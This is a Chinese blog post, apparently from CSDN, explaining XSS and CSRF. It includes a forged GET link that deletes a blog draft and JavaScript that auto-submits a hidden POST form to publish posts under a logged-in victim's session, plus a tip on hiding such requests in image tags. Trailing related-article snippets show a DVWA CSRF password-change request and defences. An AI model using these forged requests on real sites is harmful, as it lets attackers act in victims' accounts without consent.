CSRF跨站请求伪造攻击+案例分析

最新推荐文章于 2025-06-08 15:29:37 发布
最新推荐文章于 2025-06-08 15:29:37 发布
阅读量3.1k 收藏 3
点赞数
CC 4.0 BY-SA版权
分类专栏: 技术贴啊 文章标签: XSS CSRF 实例
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/ylf13/article/details/38157885
本文深入探讨了Web前端黑客技术,包括XSS跨站脚本攻击和CSRF跨站请求伪造攻击,详细解释了攻击原理及防范措施,旨在帮助用户了解并预防可能的网络威胁。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

最近在拜读《web前端黑客技术揭秘》,不是想学下三滥的手段,只是为了防止自己被骗。。。

由于采用了同源策略,所以想要实现跨站攻击,还是有一定限制的,但网络协议的自由也还是留下了很多漏洞。

XSS跨站脚本攻击和CSRF跨站请求伪造攻击是刚开始接触的攻击手段。

XSS:跨站,顾名思义,需要不同域的网站,例如正规网址是www.foo.com,而我们的恶意网站为www.evil.com

如何能够获取到正规网址的cookie,从而为所欲为呢?这里就需要跨站获取信息。

一般XSS分为三种:

(1)反射型XSS

这是暂时的,利用get 或者post参数实现,如果服务器端对我们的参数有回显功能,那么这就可以实现了

例如服务端对我们的请求会调用eval(arg)

那么我们只需要在http://www.foo.com?alert('I can do anything')  连接后加上我们要执行的js脚本,然后把该连接发给用户点击,就会执行后面的js脚本了。

(2)存储型

例如利用网站留言或者博客等功能,由于他们会持久存储,所以我们只要嵌入些恶意的代码,所有查看该留言或者博客的人都会被攻击了,庆幸的是现在知名的网站都不会让你那么容易做到代码嵌入,尤其脚本,几乎不可能,我也是小白,具体方法布吉岛了。


(3)DOM 

就是通过修改DOM节点,例如<img src="http://www.evil.com" /> 利用图像可以加在第三方资源。。。


另一种攻击就是跨站请求伪造

一般网址对html标签发出的跨站请求不会被同源策略所限制,应为我们经常借此加载第三方资源,例如img, script, css样式 和框架内容等。

这也给我们留下了一些后门。。

下面我简单举个例子。。。。很不道德的就拿博客举例子了。没有恶意,只是为了说明CSRF跨站请求伪造

(1)Get请求伪造

博客删除一般是采用get请求,后面加上文章id号,所以如果我们能构造一个连接带有删除的请求和id,同时用户已经在浏览器上登陆了博客,那么会利用自带cookie来实现跨站请求的伪装。

例如我有一篇草稿博客,它的删除请求是:http://write.blog.host.net/postlist/0/all/draft?t=del&id=11111111

Id指的就是文章id,只用用户去点击该连接那么。。。。。文章就被删除了,这里我们成功伪造了请求,删除别人的博客,不过很不道德。。

(2)Post请求伪造

一般文章的提交采用的是Post请求,所以我们可以帮别人写文章了大笑

我们经常看到自己的一些社交上莫名被发广告状态,也许就可以通过这个实现了。。。。

首先得分析实际的post请求信息

很简单,直接利用浏览器自带的开发者调试功能F12(chrome下)

点击network,清空当前内容,然后我们正常的提交一份博客,这时候会捕捉下所有请求信息,注意下post请求,一般就是我们要利用的请求。

如下图,我们看到post请求地址已经Post需要的信息,好啦,接下来就是利用这个来模拟post



var f = document.createElement("form");
    link = "图中用黄色荧光笔画出的地址,直接右键copy ,因为还有前面头信息没显示完全"

    // 这里定义一个函数,向form添加数据
    // 就是右边Form Data的键值对了
    function addData(fm, key, value){
    	var e = document.createElement("input");
	    fm.appendChild(e);
	    e.type = "text";
	    e.name = key;
	    e.value = value;
    }
    if (f) {
    	body = document.body;
	    document.body.appendChild(f);
	    f.method = "post";

	    addData(f, "titl", "test4");
	    addData(f, "typ", "1");
	    addData(f, "cont", "nihao");
	    addData(f, "desc", "");
	    addData(f, "tags", "");
	    addData(f, "flnm", "");
	    addData(f, "chnl", "0");
	    addData(f, "comm", "2");

	    addData(f, "level", "0");
	    addData(f, "tag2", "")
	    addData(f, "artid", "0")
	    addData(f, "checkcode", "undefined")
	    addData(f, "userinfo1", "121")
	    addData(f, "stat", "draft")
	   

	    f.action=link;
	    f.submit();	
    };


执行后,就可以发表出文章了。。。


最后补上一句,如何让别人去点击我们的连接呢?

加载第三方资源是个让人又爱又恨的家伙 

我们的网页嵌入<img src="我们的伪造请求"> 这就伪装的让人发现不了了

跨站请求伪造CSRF攻击:原理、案例分析与防御策略
m0_61532714的博客
06-12 3052
多层次的综合防御策略,包括使用CSRF令牌、验证HTTP请求头、限制同源策略和双重提交Cookie,是防范CSRF攻击的关键。CSRF攻击的核心在于利用用户已经登录的身份,向目标网站发送恶意请求攻击者通过构造恶意的GET请求,诱使用户点击链接或访问恶意网站,从而在用户不知情的情况下执行恶意操作。攻击者通过构造恶意的表单提交,诱使用户点击按钮或自动提交表单,从而在用户不知情的情况下执行恶意操作。在每个敏感操作的表单或请求中包含一个的CSRF令牌,服务器在接收到请求时验证该令牌,请求的合法性。
跨站请求伪造-CSRF利用案例+SSRF
xiaoheizi的博客
07-02 322
(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。举个生活中的例子:就是某个人点了个奇怪的链接,自己什么也没输,但自己的qq号或其他的号就被盗了。:小黑子在登录后台管理自己网站的时候,突然有人给小黑子说有少妇视频,随后给小黑子发了个URL链接,小黑子直接点了进去,GG!将文件放置到能让小黑子访问到的服务器下,加小黑子好友,将地址链接发送给小黑子,告诉小黑子是少妇视频。
csrf跨站请求伪造简单示例
10-18
一个简单的csrf跨站请求伪造的示例,只有一个简单的表单提交功能.通过伪造表单提交,完成一个简单的钓鱼案例
浅谈CSRF攻击方式(转)
weixin_34090643的博客
07-08 1861
浅谈CSRF攻击方式 一.CSRF是什么?   CSRF(Cross-site request forgery),中文名称:跨站请求伪造,也被称为:one click attack/session riding,缩写为:CSRF/XSRF。 二.CSRF可以做什么?   你这可以这么理解CSRF攻击攻击者盗用了你的身份,以你的名义发送恶意请求CSRF能够做的事情包括:以你名义发送邮件...
CSRF跨站请求伪造)详解
最新发布
tubug的博客
06-08 756
CSRF(Cross-Site Request Forgery)是指攻击者诱导用户在已登录某网站的情况下,执行非本意的操作(如转账、改密码等)。它依赖于用户已登录状态下浏览器自动携带 Cookie 的特性。 攻击者发现目标网站存在 CSRF 漏洞,关键操作接口未对请求来源进行身份校验。 攻击者构造包含恶意请求的 Payload(如自动提交的表单、恶意图片、JS 脚本等),并嵌入到钓鱼网页或第三方平台。 通过社交工程手段(如钓鱼邮件、社交消息、伪装广告等)引导用户点击该页面或链接。 用
CSRF——跨站请求伪造攻击
peanut5036的博客
12-04 1305
一般来说,攻击者通过伪造用户的浏览器的请求,向访问一个用户自己曾经认证访问过的网站发送出去,使目标网站接收并误以为是用户的真实操作而去执行命令。常用于盗取账号、转账、发送虚假消息等。攻击者利用网站对请求的验证漏洞而实现这样的攻击行为,网站能够确认请求来源于用户的浏览器,却不能验证请求是否源于用户的真实意愿下的操作行为。
CSRF跨站请求伪造攻击及防御
认知 行动 坚持
06-06 3526
产品的安全性,是第一位的。在之前工作中,坏人曾使用CSRF(cross-site request forgery)进行过恶意攻击,今天来聊一下CSRF攻击及防御。顺便提醒大家: 1.遇到不明链接,不要随意乱点。 2. 在登录银行网站后,要记得退出登录,而不是直接关闭网页。
CSRF跨站请求伪造攻击
qq_68163788的博客
02-05 2212
CSRF(Cross-Site Request Forgery)是一种网络安全攻击攻击者利用用户已经登录的身份,在用户不知情的情况下发送恶意请求,以执行某些操作或获取用户的敏感信息。攻击者通常会诱使用户访问包含恶意请求的页面,或者通过其他方式注入恶意代码,以触发CSRF攻击CSRF攻击通常利用用户在其他网站上的身份验证信息,因此攻击者可以利用这些信息来执行恶意操作,比如更改用户密码、转账、发送消息等。由于CSRF攻击利用了用户的信任和已登录的身份,因此很难被用户察觉。
CSRF跨站请求伪造漏洞修复
折腾java的博客
06-09 3484
跨站请求伪造(Cross-site request forgery,简称CSRF),是一种常见的Web安全漏洞,由于在Web请求中重要操作的所有参数可被猜测到,攻击者可通过一些技术手段欺骗用户的浏览器去访问一个用户曾经认证过的网站,遂使攻击者可冒用用户的身份,进行恶意操作。 经测试,服务器未校验Referer头,因此攻击者可以直接构造一个恶意的访问地址让用户在不知情的情况下访问从而实现CSRF恶意操作。增加拦截器,判断referer是否合法,合法则放行。......
CSRF跨站请求伪造攻击及防范
CSRF(Cross-Site Request Forgery)跨站请求伪造攻击是一种常见的网络安全漏洞,也被称为“海报攻击”或“一次性攻击”。攻击者利用用户已经登录过的网站的 Cookie 信息,诱导用户访问恶意网站,通过携带伪造请求...
CSRF跨站请求伪造攻击实例解析
CSRF攻击是一种常见的网络安全漏洞,攻击者利用用户在已登录的情况下,通过伪装成合法请求,向服务端发送恶意请求,以实现攻击目的。接下来我们通过具体的实例来解析CSRF攻击的过程和影响。 ### 攻击者如何利用CSRF...
Web安全之CSRF跨站请求伪造攻击
brizer的博客
09-02 2468
CSRF全称Cross-Site Request Forgery,跨站请求伪造攻击。 其攻击原理是: 攻击者在用户浏览网页时,利用页面元素(例如img的src),强迫受害者的浏览器向Web应用程序发送一个改变用户信息的请求。 由于发生CSRF攻击后,攻击者是强迫用户向服务器发送请求,所以会造成用户信息被迫修改,更严重者引发蠕虫攻击CSRF攻击可以从站外和站内发起。 从站内发起CSRF攻击
CSRF攻击与防御
qq_41030039的博客
09-29 258
**CSRF:**跨站请求伪造。简单理解就是黑客利用你的身份去访问正常网站,服务器认为这个请求时合法的,然后黑客就以你的名义发送邮件或者转走你的money。这个网站就存在CSRF漏洞。 攻击原理: 用户C访问受信任网站A,输入账号密码登录网站A。 通过验证后,网站A产生cookie信息返回给浏览器,此时用户登录成功,可正常访问A。 用户在未退出A之前,在同一浏览器中,去访问了网站B。 网站B接...
网络安全进阶学习第三课——CSRF跨站请求伪造
p36273的博客
07-01 1783
漏洞风险存在;伪装数据操作请求的恶意链接或者页面;诱使用户主动访问或登录恶意链接,触发非法操作;
【WEB漏洞原理】CSRF跨站请求伪造
过期的秋刀鱼
08-28 1639
跨站请求伪造(Cross Site Request Forgery,CSRF)是一种攻击,它强制浏览器客户端用户在当前对其进行身份验证后的Web 应用程序上执行非本意操作的攻击攻击的重点在于更改状态的请求,而不是盗取数据,因为攻击者无法查看伪造请求的响应。借助于社工的一些帮助,例如,通过电子邮件或聊天发送链接,攻击者可以诱骗用户执行攻击者选择的操作。如果受害者是普通用户,则成功的CSRF 攻击可以强制用户执行更改状态的请求,例如转移资金、修改密码等操作。
跨站请求伪造CSRF攻击
neal1991的专栏
02-21 1004
概述跨站请求伪造CSRF攻击强迫终端用户在他们身份被认证的情况下执行对于目标应用未知的操作(恶意的)。CSRF 攻击一般针对状态更改请求,而不是数据被盗,因为攻击者无...
前端安全之CSRF攻击跨站请求伪造
热门推荐
业余丰富各种技术栈
08-19 2万+
前端安全之CSRF,日常防范CSRF攻击的几种方式
web渗透测试----14、CSRF跨站请求伪造攻击
七天
03-25 3923
文章目录一、CSRF概述二、CSRF攻击条件1、相关操作2、基于Cookie的会话处理3、没有不可预测的请求参数三、CSRF的防御1、验证请求的Referer值2、CSRF Token3、验证码等验证业务过程的方式四、基于Token的CSRF1、CSRF令牌的验证取决于请求方法2、CSRF令牌的验证取决于令牌是否存在3、CSRF令牌未绑定到用户会话4、CSRF令牌绑定到非会话cookie5、CSRF令牌只是在Cookie中重复五、基于Referer的CSRF1、Referer的验证取决于请求头是否存在2、是
CSRF(跨站请求伪造攻击)dvwa
12-30
### DVWA 中 CSRF跨站请求伪造攻击)的相关信息 #### CSRF 攻击简介 跨站请求伪造 (CSRF) 是一种网络攻击方式,攻击者可以利用已认证用户的身份,在未经用户同意的情况下发送恶意请求。这种攻击具有很大的隐蔽性和危害性,因为整个过程可能在用户毫不知情的情况下完成[^1]。 #### CSRF 原理流程 为了成功实施一次 CSRF 攻击,需满足几个条件:受害者必须处于登录状态并持有有效会话;目标站点未部署有效的 CSRF 防护机制。一旦这些条件达成,只要受害者触发了由攻击者预设的动作——可能是点击某个链接或是加载特定网页内容,那么攻击便得以实现[^2]。 #### 实际案例分析-DVWA 平台上的 CSRF 模拟练习 以 DVWA (Damn Vulnerable Web Application)为例,这是一个用于测试和学习的安全漏洞平台。在这个平台上可以通过不同级别的难度设置来模拟真实的 CSRF 场景: - **Low Level**: 用户可以直接通过构造 URL 来更改其他用户的密码而无需任何额外验证。 ```http GET /dvwa/vulnerabilities/csrf/?password_new=123456&password_conf=123456&Change=Change HTTP/1.1 Host: 192.168.0.181 ``` - **Medium Level**: 此级增加了简单的 token 校验,但是这个 token 不是动态变化的,因此仍然容易受到攻击。 ```html <!-- HTML Form with static hidden input field --> <form action="http://192.168.0.181/dvwa/vulnerabilities/csrf/" method="POST"> <input type="hidden" name="user_token" value="static_value"/> New Password:<br> <input type="text" name="password_new"/><br> Confirm new password:<br> <input type="text" name="password_conf"/><br><br> <input type="submit" value="Change"/> </form> ``` - **High Level & Impossible Levels**: 这两个等级引入了更复杂的防护措施,如每次提交都会更新的一次性使用的随机 token 和严格的 Referer 头部检查等,使得攻击变得极其困难甚至不可能实现[^3]。 #### 解决方案与防御策略 针对 CSRF 的常见防范手段包括但不限于以下几个方面: - **使用 Anti-CSRF Tokens**:为每一个表单添加唯一且不可预测的令牌,并确保服务器端能够正确检验此令牌的有效性; - **检查 Referer Header**:确认请求确实来自预期的应用程序源地址; - **采用 POST 方法代替 GET**:虽然这并不能彻底解决问题,但在一定程度上提高了攻击门槛; - **增加 CAPTCHA 或二次确认步骤**:对于涉及重要数据变更的操作,要求用户提供进一步的人机交互证明[^4]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值